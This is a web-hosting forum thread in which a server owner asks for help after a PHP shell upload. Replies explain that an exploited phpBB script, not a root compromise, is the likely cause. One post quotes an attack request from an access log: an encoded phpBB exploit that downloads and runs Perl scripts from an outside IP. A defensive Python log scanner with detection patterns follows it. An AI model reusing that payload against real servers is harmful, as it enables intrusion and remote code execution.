Thread: recent hack

  1. #1

    recent hack

    Hi, somebody using an image uploading script put a PHP script called 'php shell' on our server and gained access to it. I wonder how I could know what he did and how much access he gained?

    There is a process on my server now like this:

    User Domain %CPU %MEM Mysql Processes
    nobody 123.39 3.56 0.0
    Top Process %CPU 42.6 usr/local/apache/bin/httpd -m z
    Top Process %CPU 42.5 usr/local/apache/bin/httpd -m z
    Top Process %CPU 42.4 usr/local/apache/bin/httpd -m z

    Is this normal, that a user 'nobody' is doing that much CPU load? Thanks.

  2. #2
    Join Date: Dec 2004 | Location: New York, NY | Posts: 10,574
    Any box that is rooted should probably be formatted. Sorry to say.
    MediaLayer, LLC - www.medialayer.com Learn how we can make your website load faster, translating to better conversion rates for your business!
    The pioneers of optimized web hosting, featuring LiteSpeed Web Server & SSD Storage - Celebrating 10 Years in Business

  3. #3

    ok

    I am willing to do that, just what do you think is the best way?

    Do you think that changing my box and using cPanel's ability to copy all accounts from one server to another could be enough?

  4. #4
    Join Date: Oct 2003 | Posts: 90
    Hmmmmmm... shouldn't that be /usr/local/apache/bin/httpd?

  5. #5

    process

    Top Process %CPU 42.6 usr/local/apache/bin/httpd -m z

    I think that process may be a backdoor or something. I am turning it off for now; let's see what happens.

    --> UPDATE

    Now I know I am hacked; I saw some process called 'eggdrop'. So is the option to change to another server going to help, even if I use the copy account feature on cPanel? Thanks.
    Last edited by name2me; 04-18-2005 at 05:44 PM.

  6. #6
    Join Date: Dec 2004 | Location: New York, NY | Posts: 10,574

    Re: ok

    Originally posted by name2me
    I am willing to do that, just what do you think is the best way?

    Do you think that changing my box and using cPanel's ability to copy all accounts from one server to another could be enough?
    You could always give that a try. Perhaps order a new server in the same data center, transfer all accounts over and close the rooted box. However, be sure to get someone to harden your new server first. Also, beware of some errors that may occur using the WHM copy account feature.

  7. #7
    Join Date: Mar 2003 | Location: California USA | Posts: 13,294
    The box is not rooted. Look at the name the process is running under: it says "nobody". More than likely it's an exploited PHP script.
    Steven Ciaburri | Industry's Best Server Management - Rack911.com
    Software Auditing - 400+ Vulnerabilities Found - Quote @ https://www.RACK911Labs.com
    Fully Managed Dedicated Servers (Las Vegas, New York City, & Amsterdam) (AS62710)
    FreeBSD & Linux Server Management, Security Auditing, Server Optimization, PCI Compliance

  8. #8
    Join Date: Mar 2003 | Location: New Jersey | Posts: 1,277
    I've seen this type of thing very frequently lately. As thelinuxguy said, it's most likely an exploited PHP script. Make sure PHP is up to date, and your phpBB installations are up to date. Kill the process, secure your /tmp directory (watch for any files/activity/existence of /tmp/.temp) and you should be able to prevent it from happening.

    Formatting is not always required, in this type of situation.

  9. #9
    Join Date: Mar 2003 | Location: California USA | Posts: 13,294
    With that said, if you move to another box, it will most likely happen again because you didn't find out how it was happening and patch it up, and you end up going in a nonstop loop.

  10. #10
    Join Date: Nov 2004 | Location: England | Posts: 513
    Suspend all your services, firewall the box, and figure out what's going on. As thelinuxguy says, it doesn't look too bad - yet. But with an eggdrop going on, who knows.

  11. #11
    Join Date: Dec 2004 | Location: New York, NY | Posts: 10,574
    Hmm...

    Now that I look at it again, all I can say is get someone professional to take a look at the box. Having eggdrop running is definitely not good, especially if the data centre does not allow IRC.

  12. #12
    Join Date: Mar 2003 | Location: California USA | Posts: 13,294
    Originally posted by vidahost
    Suspend all your services, firewall the box, and figure out what's going on. As thelinuxguy says, it doesn't look too bad - yet. But with an eggdrop going on, who knows.
    I doubt it's rooted. Eggdrop won't usually run as root.

  13. #13
    Join Date: Apr 2005 | Location: Vancouver B.C. | Posts: 51
    Eggdrops don't run under root or under an su account. That goes for emechs too.

  14. #14

    tech support

    Tech support from my provider said:

    "It is from /var/tmp, which turns out not to be linked to /tmp, which has protections in place to prevent those from happening. I have removed it and fixed it so it will not happen again.
    It is not a compromise of the system or anything, just one of the annoying exploits through someone's PHP page to upload the PHP shell to run."

    I think everything is fine now.

    Thanks everybody, you were right and I learned some stuff.

  15. #15

    Does anyone know?

    Now some scripts do not work, especially the ones that read files from directories BUT in the same account. How could I specify to PHP to let those accounts do that??

  16. #16
    Join Date: Dec 2004 | Location: New York, NY | Posts: 10,574
    You may have PHP open_basedir protection on. Turn that off and see if it helps.

  17. #17
    Join Date: Mar 2003 | Location: New Jersey | Posts: 1,277
    Yes, we know the problem: upgrade PHP and phpBB. If you have a global access log, you will see something like:

    /hsphere/local/home/xxxxxxx/xxxxx.com/phpBB2/viewtopic.php 203.98.133.222 - - [18/Apr/2005:04:28:58 -0400] "GET /phpBB2/viewtopic.php?p=27741&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20cd%20/tmp;mkdir%20.temp;cd%20.temp;wget%20http://61.85.234.215/.zk/msn.txt;wget%20http://61.85.234.215/.zk/coll.txt;wget%20http://61.85.234.215/.zk/g.txt;perl%20msn.txt;rm%20msn.txt;perl%20coll.txt;rm%20coll.txt;perl%20g.txt;rm%20g.txt%3B%20%65%63%68%6F%20%5F%45%4E%44%5F&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73%68%5D%29.%2527'; HTTP/1.1" 200 77599 "-" "LWP:imple/5.65"
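
    As an added example (not code from this thread or from any of the posters), here is a small Python script that does what the post above implies a defender should do with the access log: parse each request, percent-decode the query parameters repeatedly (the highlight value above is double-encoded, %2527 -> %27 -> '), and flag parameters that carry PHP execution calls, request variables used as code, or shell command chains staging files under /tmp. The two sample log lines are constructed; the second mirrors the request shown above in shortened form, and the indicator regexes are my own assumptions, not an official signature.

```python
import re
from urllib.parse import unquote_plus, urlsplit

# Constructed sample access-log lines. The first is a benign phpBB search request;
# the second mirrors (shortened) the request quoted in the post above, including the
# per-vhost path prefix that a "global" access log adds in front of the client IP.
SAMPLE_LOG = [
    '203.0.113.5 - - [18/Apr/2005:04:10:01 -0400] '
    '"GET /phpBB2/viewtopic.php?t=12&highlight=linux HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '/hsphere/local/home/xxxxxxx/xxxxx.com/phpBB2/viewtopic.php 203.98.133.222 - - '
    '[18/Apr/2005:04:28:58 -0400] '
    '"GET /phpBB2/viewtopic.php?p=27741&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20cd%20/tmp;mkdir%20.temp'
    '&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73%68%5D%29.%2527\' HTTP/1.1" '
    '200 77599 "-" "LWP:imple/5.65"',
]

# Common log format with an optional leading vhost/script field (as in the global log above).
LOG_RE = re.compile(
    r'^(?:\S+ )?(?P<ip>\d{1,3}(?:\.\d{1,3}){3}) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+)(?: \S+)?" (?P<status>\d{3})'
)

# Indicators (assumed, not an official signature): PHP execution functions, request
# variables spliced into code, and shell chains that stage files under /tmp or /var/tmp.
PHP_EXEC_RE = re.compile(r'\b(passthru|system|exec|shell_exec|popen|eval)\s*\(', re.I)
REQ_VAR_RE = re.compile(r'\$(HTTP_GET_VARS|HTTP_POST_VARS|_GET|_POST|_REQUEST)\s*\[', re.I)
SHELL_CHAIN_RE = re.compile(
    r'(cd\s+/(?:var/)?tmp|wget\s+\S+|curl\s+\S+|mkdir\s+\.\S+|\bperl\s+\S+)', re.I
)


def deep_unquote(value, rounds=3):
    """Percent-decode repeatedly so double-encoded payloads are exposed (%2527 -> %27 -> ')."""
    for _ in range(rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value


def parse_query(query):
    """Split a raw query string on '&' only, keeping values undecoded for deep_unquote().

    Done by hand instead of parse_qsl() so behaviour does not depend on the Python
    version's treatment of ';' as a separator (the payload above is full of them).
    """
    pairs = []
    for chunk in query.split('&'):
        if chunk:
            name, _, value = chunk.partition('=')
            pairs.append((unquote_plus(name), value))
    return pairs


def analyse_line(line):
    """Parse one log line; return ip, script, status and the indicators found, or None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group('target'))
    indicators = []
    for name, raw in parse_query(parts.query):
        value = deep_unquote(raw)
        if PHP_EXEC_RE.search(value):
            indicators.append(f'{name}: PHP execution function')
        if REQ_VAR_RE.search(value):
            indicators.append(f'{name}: request variable used as code')
        if SHELL_CHAIN_RE.search(value):
            indicators.append(f'{name}: shell command chain')
    return {
        'ip': m.group('ip'),
        'script': parts.path,
        'status': int(m.group('status')),
        'indicators': indicators,
    }


def scan(lines):
    """Return only the parsed requests that carry at least one indicator."""
    hits = []
    for line in lines:
        info = analyse_line(line)
        if info and info['indicators']:
            hits.append(info)
    return hits


if __name__ == '__main__':
    for hit in scan(SAMPLE_LOG):
        print(f"{hit['ip']} {hit['script']} status={hit['status']}")
        for ind in hit['indicators']:
            print('   -', ind)
```

    Run against a real log, this reports the client IP, the script hit and which parameter carried which indicator; a 200 status on such a request (as in the line above) is the signal that the attempt actually reached the script, so those are the entries worth correlating with /tmp contents and process listings.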

  18. #18

    upgrading

    Using cPanel Web Host Manager, how can I upgrade PHP and phpBB? Thanks, those seem to be the errors showing.
